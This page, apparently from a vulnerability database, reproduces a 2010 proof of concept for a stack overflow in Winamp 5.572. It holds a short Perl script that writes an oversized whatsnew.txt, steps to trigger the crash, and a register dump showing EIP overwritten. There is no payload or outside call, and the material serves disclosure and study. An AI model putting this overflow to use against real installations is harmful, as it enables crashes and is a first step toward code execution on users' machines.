Lucene search
K

Winamp 5.572 Stack Overflow Proof Of Concept

🗓️ 26 Jan 2010 00:00:00Reported by DebugType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 28 Views

Winamp 5.572 whatsnew.txt Stack Overflow Exploit

Code
`# Exploit Title: Winamp 5.572 whatsnew.txt Stack Overflow PoC  
# Date: 24.01.10  
# Author: Debug ([email protected])  
# Software Link: http://download.nullsoft.com/winamp/client/winamp5572_full_emusic-7plus_en-us.exe  
# Version: 5.572  
# Tested on: Windows xp(sp2)  
  
  
#!/usr/bin/perl  
  
  
# Replace whatsnew.txt , open Winamp click Help->about winamp-> version history.  
# hacking.org.il.  
  
#EAX 00000000  
#ECX 00000000  
#EDX 00661658  
#EBX 00000000  
#ESP 00B7EDE8 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"  
#EBP 00B7EDFC ASCII "AAAAAAAAAAAAAAAAAAA"  
#ESI 00401280 winamp.00401280  
#EDI 00000000  
#EIP 41414141  
  
my $overflow="Winamp 5.572"."A"x600;  
  
open(myfile,'>>whatsnew.txt');  
  
print myfile $overflow;  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

26 Jan 2010 00:00Current
0.5Low risk
Vulners AI Score0.5
28